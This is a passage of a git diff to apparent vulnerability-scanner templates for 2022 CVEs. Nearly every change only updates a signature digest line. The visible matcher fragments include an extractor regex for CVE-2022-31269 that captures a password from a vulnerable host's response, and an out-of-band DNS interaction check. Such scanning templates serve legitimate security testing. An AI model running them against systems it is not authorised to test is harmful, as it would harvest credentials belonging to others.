4a0a004730450220540cd86d1dee93077c276c985d9b5d439c8d0d364686376934bd59f7a0539dc3022100fb7fdb3b35ce21729be397978ce34b869b90a24557897b8ac9ecc8d5f3334bc5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ee09e04779ab9e390ea3dd41adec063167db1bc4a9183401686d624e8b4e8164022100ff04a226c3779fda7902f20e4e6a82b7e4dd91700abc19aa203ad0cf1beb9311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 7199a9ce8f..a87ee54ca5 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022028d1afdf5687b1a170c934727222f526c40d1b0930a803e904087b8d3157934702207247e12835d2f4a6748d0cec844f967f138f4f5a7cc9ea201a31e69a988800b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a9eb6ffd6d9d2e7cf0a5797e015e2897f0372d0fbf73bbc0a3d9f065a3970b26022100e6144b754a62a376919146bdb7ef663f8c1eb8a8fda735c17eb9d71fedb1e504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 3f3d03d966..9e87c43b23 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207d763f99249e2ee90668cde3a8ee73ced044eb49884e9f701bcf39561211cd75022032dc05c48fd4c61efa781eca6f4e351b32c3dd9646e4d298a309d742f39ea684:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205eaca87c7c7ebfaaa4548a94a45718bba0873b173278c1bedf2c512f32de7754022100a55ab1aefec5968d217e3324d68ccd1e2bcb0aca2574b815ae092b78dfd8b754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index a7f78c8684..f48ce7b9b1 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100eb45f7a0d9eb74a68d402095ba1053cb4279a9a731dc4846fabacf8bfe65e0e2022100e1ece65d31dec3636d227d83ecaa1283d03272c451ae7f9223aa257505637b34:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4800ddda9e7f8982b06d10435755e1685a6f97aeb4fd1665766ed2801d515e7022100807a61c2983070b22ff5c3dc270ff217dc9a5b458bcaab49415fe501dfe93691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 9c9c604e08..8a67e224ab 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -55,5 +55,4 @@ http: - type: regex regex: - Password='(.+?)' - -# digest: 490a0046304402200dd209fb71ffa2fe0c892357caee25ec85e17d04d0ec80db516735cdcc2d31a3022009f3de8ffbcb49370fecdabeeb3df17affb2d9372976ba84f11cfb19c463652f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9399fe71765a7348931305c6290eb6265d1479e36422d84cc18f16d4ae487c902210094730b7a219f292020f1c79b9b3259069828074c788556b4f95eb3abdd94304a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index b7a7055cf8..57d62bbf33 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009402bacd47dc72cb8f3cf758491ae5acc76078dd612412f799eaeb6338e1a269022100e0f81fb93333cb6a3a5762d98e1935b8d6dcf94dff7052360238082d633185a7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a386d7d9f199d7e2ccc63b861e264d94ef5bcbcb4c8c048a04b49a8bfea9e24a02203caf0938c8f8e6c3128ffe6b28f7992a27ae6a5ed2215d217a3ad16507cd1bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 3f698dcfd6..778c2bec04 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207174e63e1c66e16232e768e62e8965b7031cb8d14768595bd43b0f9269bb1642022031ea9f4bf09f3c268f69bb85077e8ff42eac8ceb195c2113237bdcfb5c155f89:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bda9e2e6887bfcbeaa2165b0dbcf2c9fd16c418d3135bcd7f07794822735ed98022100bd3f39275c9462206d92c664d25d4cd238d9d9a3a396b9f6f76c24be4fdf0f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index afa4d9a32e..72a9ee836c 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -51,5 +51,4 @@ http: - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and - -# digest: 4a0a0047304502205fb3efe88bf2da55ab31d1aecca8aacee346d5fb63b6375a040ebcfa5e568ec4022100f16773daf0c0621076dbfbebbb8253caa4129bbc413b952fba13a7bc225f32f3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009612504fa98b374cd89af692e0d98bb0217edaa797fc1684497f6efd5449126002202bbd53ce2bd89ed7bab7ec639d73a48e4ca0758d879ff603b1d665d341e745f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 0701c13c93..6d1d53d4cc 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e62ba772c471e147e2cdba4e15ed69a31b5b11fb387172fbc55b942d153b6cb602207b688b9fd7c7ab6ecc3d4c5e0d57eb73d744451a2ec5f7aab6cc48cd2a81c794:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100acd366cf6d50f6cd2af52e2eee4c1f40e3d6b0def235a7385ff607285f3a2573022100ab84b820c358968ad0047160ab49119b47e4630bd5a2fda38355fe1880c8aa18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 19743cdf48..edba6356d9 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -45,5 +45,4 @@ http: - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and - -# digest: 4b0a0048304602210095c4ed1b7f1de6a6feb88c86f291a34593d54b88622f2527e5d75e86817b92d3022100a0ae67a362af85bd0a710e70c6c7d254e23410fbe9e75e36593d11cf8cbfa5f6:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022048a64ad1bf37b7b7f7f14f80d691c308b11cbd7309c574cc74ef56a922c1394a0220099e1848921656795f38f7cda2bfaa90c85fc51de2c19fbd3886505f34842300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 9ce4952a46..c70f5ea283 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022039d7ff42890da22a52a2e389aa55348e4df05b145b68bce4dd8d449a8bb3a87702202a2346186bcc4f87a7fa6c8737b15433b36778b958802869c53bbaa437746826:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022041cd0ebdbb9bb5ca9e59a36ec64f0fbc2a57a26efdedf4434cd52a47b4b57bb3022100d62fe7f5c82e25c942cfaaef2bcc532005f9a21cbe615fbbc13ec0c8fdd35f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 662c583f7e..89101da485 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ce6cedc50f935d6f6debd08ae909bf47005920ef612e1f344a710b28481e76380220116de76e39bbf901d125e55ad5da8d111ae36d285edc73eb03f52c83c6e3e035:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009b426fadb6676e423aa214c4571204e93ea0e13aeb872ba413717cc71ccd635d022100d62f1df404274c4aa2418023ab0c4fd7eb438f0de7b18c92ee9250223cc0db80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index 9063ed4729..e02d37acae 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -55,5 +55,4 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - -# digest: 4a0a00473045022076927513e2f7ef8fe2e55806073f48ccf24a0e7537f4da17fa45169d3137ea8d022100f22a7ab6ac3fb7d5ea73d4eb333f113fc9f3b17c719da0bcf5424087cfcd559e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ed702af0ffeebfb2711bc2eb354cdef5a7234534dcb5e1b300b742e797760f9e0221009e781548248ee438035cd4f3f4acd8ab7f45316d87aaf39da0793096ccf18847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index c02d7dac70..e853336c4d 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b13cc13a79840f5d177fcb345c5f07745bcaaebbc11bd31106b4b3685c6df3d702202e55e95e8d3c4958752c6dfcfcfa006b394a1c0e6a21355bfca83337a3224920:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202853753932dd43c8f6f7a58e6a7bf79d97427648fe160b4ad21a0bb8cb108e6d022100a27c1634fd865b413b57095873dcaa6d53b9e219b72ebadd02861ae1c4859dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 76dc5e05de..f8398f411c 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220383ad41564738b080a42bbabba35ed1b37054790b952fc3a548eb5312fcb4e6e0220350d98fb3566d96e79023318a566d5322d430935fa70d47ee846b815db9a6285:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a79571e374d6cd2f9003ac2cf7bdd94367566f985f4ebfb1d4c54bc9e63e60020220336aa5d71938b14748fe729002176a17fed1c0af6d6fca298a83b69c93324298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 078698bf92..628b1a96f2 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204f603600a0cc6e011756ee202c9b039b65f3aeab40c8c42187837c446a2acce902200cd7f979d0aa8fec7f2ed9323ddeaeb9210aa45a85919db6d6e4349848f6c31a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220219a172fe81133c7de98c365b18226192be75ec8e01b44acb757e8516493078b0220797ee777b1c436876cdc3c52f6aa624d54b37018144d60b9e1388c4530ad044a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 7d806dfbc1..44095fd114 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -90,5 +90,4 @@ http: regex: - name="CSRF_token" value="([0-9a-zA-Z]+)"/> internal: true - -# digest: 4a0a00473045022100a60752a1c20e5018ed93836d2a2d1d9d5094bc2e2045635100e29d822418d45302203164ee3a294589bf4770cefccee8d1919f7fbc125db4f5edfaac7cf4d2d9d280:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100af59e3639a9785d29d0a60881f3d6767960591350cbb6f3251fdd85fbcbecffb02207da432c24eee4a88827562bcfb0af046b6f9f4e1cca7e4eef0f81d879ac9c478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index ecbd1120dd..84368d31e6 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Dashboard")' condition: and - -# digest: 4b0a00483046022100fc61940e734a423500793ef03b2da797dec690f446e95e6bd3ff01fc769de057022100ceafe3ac2afd08cca24411c4709c56f66b42a15216dbde96e9def3ed02e4dc3c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207f13b8ae1d3734d438e15cf4f15f56039468e7fa636ef3d94469b60fb45e4f94022100e7c6977108f72c2402808ef388893f120aa104ca8e5867c53f6163e9b7646453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 2682cce193..1f0d6f5ca0 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022017d996f5878fa92bf79b255f0dba0c940cd2d4b22451483ab6edb3f91a75a0af02205fcd0627c8bc6b9dab6c29b6777a17dfa497d7cd809dbf740005ba8b6dfb5ee8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bd2d0f712bfef28cb49ab12b274bbb694bddcae782880863793c8c45cbd4c516022100d7009337ecd16476270126c38a13a729554029d12558eadcf462cb8093d44504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 126fbf08ed..807a0f6ccb 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009196ec605490e054f5b47d7b365d2422eacc7b9682896af5d2f6811a2b903a4c022100b5707720f6435b57235b7269fe06091a4ae7eee85577dfe9076dc0dfafd22901:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206ec020c43118442175d05a187b76b1c43457055510c52ef6a786598bec5d84f3022100b69fdada27a37d7987bf742a7c7dc373e3a9c53269223802c538b24be4cf0f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 5b949dfb20..05b0a70781 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -45,5 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and - -# digest: 4a0a00473045022100971f51d1d06908568c2547495bebe77959018c51d10ee28ec165e4bd61acfae202204d414474300019ffc54e8a03a9ae20e7af6c29e4769b89574219986186af0cf7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca7b283e01402969f674babb7836d278a4b9c09b5ab94f8de025fa2df12ab14d0220530f3845fcd90bedb7776b7b3ead565ad37a14e8aa908e922ac4765238fd0e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 55f8a9c57a..80ae39d775 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -45,5 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and - -# digest: 4a0a00473045022100e7877da333ff6c8d174f6967def9c399cd284a307919de3e581a77ea56f80147022050d0a3ddb18ae130d71543ed332a750cf75b4d843f413b767b2b84c98f1d2f7c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203de37f527e2445e24db41c215d2927788aba2c201ff7cdf65feabf24a121a9a702203ea7bd83af488dbbf884ccd95f59352f51aa3ead0e7f0a1b5d392c0f7b6cc9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index baf2490a3d..3056ac55e3 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -45,5 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success")' condition: and - -# digest: 490a0046304402203f5ce3834f51a5378d16d9601fb7dd2ec9eea9f732079674fcf5fcfa9b6406d7022025375ec4a331dc4f30b8fb7f0505244eb66b8e9c89a885cf16ebd718924db857:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022012bf64a819d09b0e15f0ac8fb8299c98919b0cd281051a469612122f619f053e02204941f4fa47a1c72f2427e377770eba456d1c2eb730e916e1a02a66a374dda0a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index 1d8fab9147..63f63b5821 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and - -# digest: 4b0a004830460221009610a4f08ff27f82d47020fe58bafc6d017afe6c5dd8715c75c487fafb28396c022100eacd81a199a7ba8d5dea987b5f79f9af5be17667ef16ffbc0751fa4a91d05fc1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6d2590b46cc03b3244e2478a7cc1759df50c8b537e05044c59fb74b1382f3d902207c58f336d51350826febba860741cf6f3f7e44c5188fe6fd2fc034feba9a4a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index ee0db293e7..42f57fff9e 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and - -# digest: 4a0a0047304502210092605a8f6cce487489d892b343f964b6f8e20e9f41b5044db2456c9eafc2e50102204193e21b5d283a16e35c2eb6b09b22e07ab8d93917d3e2194025afc6dc78f8c6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100af2d51c1361d319aeaa4f6331ef4587284a9c76d613bb02c60b1e555d9f4ab51022100a6732c4a19bbc8ebab95f6b16640a54faf174832b7e897b7b64978ecadac32cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 3a4a4d3cd9..8a33ed690e 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and - -# digest: 4b0a004830460221009c9662678bf3323b11accc0ad569276eb881f3f9cdeaa4fbba7d2c06eebbe3b20221009a3e818c78d99721de1f8ff128e9f325b5d839e6b5b9511fc18719dc324b40a6:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220657837d7873919465c144de13cb663e761b762a1eae1e1398df630d79da43bf6022032d0264cc8314eec77ba61ac8be336b35f4ddafb30609080b54cd6758519f0de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index 9903fe7331..397e15147e 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and - -# digest: 490a0046304402202d2212f68ef9c1e894bd42259fbc3bc5dfbaac54d36d1fccf9235c985ebcc1c70220683458ec9fff32abacc530d8d3e63c14862ef6ef917e17d22ffa4fb6a0257743:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a8bbfeebecd76ba05cf545c3586852f7b363df789fbd85e5530b90a2687e7e33022062f8f9e25fa834c9b7cbda1f0de125bfd02c41355fc5a984d2918ac7d57f7a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 116a71df24..8f1e2c77c8 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c23611f2571d51c23096fc223549c020836e967afb34b88a65ac9c7f50a2cda02202af37ffb2e5d6fbcb3684c15fde31b5d4b2f5d945f4f0f63e647725d3c5307c9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022022c7ebd551a866f03332decc0319627d6bd918cd9b085e7602eac00255a35791022100dd1a7cc284fe1e1f541192abbff3a26783ff964bcd4599e324351c5d5e741344:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index 1fffccff83..40a6164e4f 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -46,5 +46,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 490a0046304402205a7ffd216b48871fcfee642661141d8d656ba51f5a2a701db19f491f5b4d30c7022069bd70eafd6286826576a4e1d69161ec664593ebc466092655074e113cece540:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022056700b51bd9286e4bcab86357e5b7adf749d71539facfd9c8b68244802d5dcac022100e8df9fb2ae21ef53ede57afb3a6e704aa1d2bc45e181a4ffee29ee180b4acc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 9498246c9f..29e41ad5c5 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -38,5 +38,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 490a0046304402205079a28d736c1816972723a94171abd1299add273b3910f8fb89ab172aa70bfe02203ed2b81a5c0f3fc8aa632d5932b129ac463a1eb5d647d0702b35e64a1e696301:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210092a86f50e0af5936e5ef0e50eb5c1d531ba08d51f0f2bb0978b4974b9f22fe460221008f30ae236790505e8cc6d89d9f49f08391191b2e940f221ff844dd6d57f6c1a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index c282a85203..57af8c8e13 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -38,5 +38,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 490a0046304402204fcd848a2e147a07ee91d96022c69d983a86fba75455c6da4088085855d44ed402205f3beddbe4fe55a34f3e5f87d4a5111f5fc138803f4d48665192a38d04d8848f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210092654ec7e932a375b4033ad4b8fdd161e24055a7e3462207f7d428d005b115be022007199935d51b8f34c5c464dd81fd152062fd00fd75a88579e1f8c0970acaebc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 637687204e..dcbba7eb5d 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022004bafb066bf1805c51a4e15caa262f684da4537f2284cf51bfbfa2edfee9d14c022100b23161c42357fd10335f0f924ed388b02acb10092a236311ae922b9b008a5aeb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205dfd65902c7918865c67fcaa6e6b8d4b955438736c2fa4b53cb240f57762b36e022100c76b20a6a2338c0c21f569ce95bc96a2819822e809146fb5b60b32f42a8a6af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index cdf5274bda..549851a3df 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022073107cb138ff85ce5bb92746b76863ec43c527de0e29aaafadb161bd4a11fc6a02205364f6cc95f20678c504197cd8af4f25f2a374096978388cd85df5752499b4d6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c45af3874758f3a471348c2200f924f06a92e340935ad07d29756b8251d96d1a0220180b02a5d3a1be4caabbb9550558e81cc6403bf09d3426b9b58d81c3f43b0fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index c797f4b39b..8d3685beef 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210081f0452528859b02c4a087f14f77d0d629212e81ec9793f91c9fa8f8b55cba3502203bf0b1824b015b0f929761e77068803a3477257797b071eb5835dbe26d4b14d7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008c9a5c9c09e34532e13f86b88d627273034eb32275af35adf87c8fef621a6971022100f384fb83f3b5a17a782a10df274b6192284012005fd41bf83ec8f056e66b32dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 55ed9bf257..9b14ab7be2 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cc5b9c3ae3679561a7f596369f29357d0712e9bfc7330d89ab7623b4377cb708022017ff976c952dd6b0848c6db3b963645cb311e3592e31b85a2324d5ba1838fe62:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201002310a1a739cb26894e793e70b3a72f01569a8a444ac54583cbb3e901443ad022100d4ee80d2650a73b0b00bb572d40dd2d3f1cf1e14fa0fe376ac2d9f6e72a20afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 2781c3c5d4..45a9045cc1 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206b9d6df7f1839f23fb3b1575a36da0c67473f1699e9eb6124d4562c4c72e7ad8022100d2ac083d18acf5f953743d0db3a853dd1ade24fa68ccd48e931ea9737e4834f3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bcc3cce12f52e42d825a9113c73313ab39fcb53023108e3a7d40a1c70045bf98022100ccce416c37653ca3f3294edbda01a836ae1e54b16b7222c788e77e26f16b6c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 22b3a6ed46..7d9dce30a5 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201ebe11752d116d0267cd59e1b9e934d885ed24ebd774970e069eeea099ab24a80221009aad0c9e1146a33637f29d76d86e437e092340da19fe11e69e9351e90d7f5c7e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200caa2331811d721a2eb790fb37bc23ecef64767becefae68736791d57182770102206aeb2f2ec4538e5128a44cf5fe9b0c4aafb50b5b19afc4fb29d865e904a2026a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index c963c0b59a..25feef5c4d 100644 